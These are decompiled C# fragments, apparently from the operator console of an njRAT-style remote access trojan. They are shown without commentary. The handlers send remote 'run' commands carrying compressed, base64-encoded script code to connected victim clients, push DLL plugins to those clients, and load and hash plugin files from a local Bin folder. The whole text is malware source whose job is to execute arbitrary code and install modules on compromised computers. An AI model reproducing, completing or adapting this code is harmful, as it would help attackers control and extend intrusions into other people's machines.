// Token: 0x060006F9 RID: 1785 RVA: 0x00039284 File Offset: 0x00037484 private void Button1_Click(object sender, EventArgs e) { string text = Interaction.InputBox("Run As :", "", "vbs", -1, -1); if (text.Length > 0) { this.RunAs = text; this.Code = this.TextBox1.Text; if (this.Code.Length > 0) { Client arg_9D_0 = this.sk; string[] array = new string[5]; array[0] = "rn"; array[1] = ima.Y; array[2] = this.RunAs; array[3] = ima.Y; string[] arg_96_0 = array; int arg_96_1 = 4; byte[] arg_8C_0 = Fungsi.SB(ref this.Code); bool flag = true; arg_96_0[arg_96_1] = Convert.ToBase64String(Fungsi.ZIP(arg_8C_0, ref flag)); arg_9D_0.Send(string.Concat(array)); } this.Close(); } }
// Token: 0x0600096C RID: 2412 RVA: 0x000517AC File Offset: 0x0004F9AC public plg(string fnn) { Class2.zP7eVJHzSiX6G(); base..ctor(); bool flag = true; this.B = Convert.ToBase64String(Fungsi.ZIP(File.ReadAllBytes(Application.StartupPath + "\\Bin\\" + fnn), ref flag)); this.Name = fnn; this.Hash = Fungsi.smethod_0(this.B); }
// Token: 0x060005A1 RID: 1441 RVA: 0x00030E38 File Offset: 0x0002F038 private void UploadUpdatePluginFromDiskToolStripMenuItem_Click(object sender, EventArgs e) { OpenFileDialog openFileDialog = new OpenFileDialog(); openFileDialog.Filter = "DLL|*.dll"; openFileDialog.FileName = ""; if (openFileDialog.ShowDialog() == DialogResult.OK) { Client arg_81_0 = this.sk; string[] array = new string[5]; array[0] = "plg"; array[1] = ima.Y; array[2] = new FileInfo(openFileDialog.FileName).Name; array[3] = ima.Y; string[] arg_7A_0 = array; int arg_7A_1 = 4; byte[] arg_70_0 = File.ReadAllBytes(openFileDialog.FileName); bool flag = true; arg_7A_0[arg_7A_1] = Convert.ToBase64String(Fungsi.ZIP(arg_70_0, ref flag)); arg_81_0.Send(string.Concat(array)); this.Close(); } }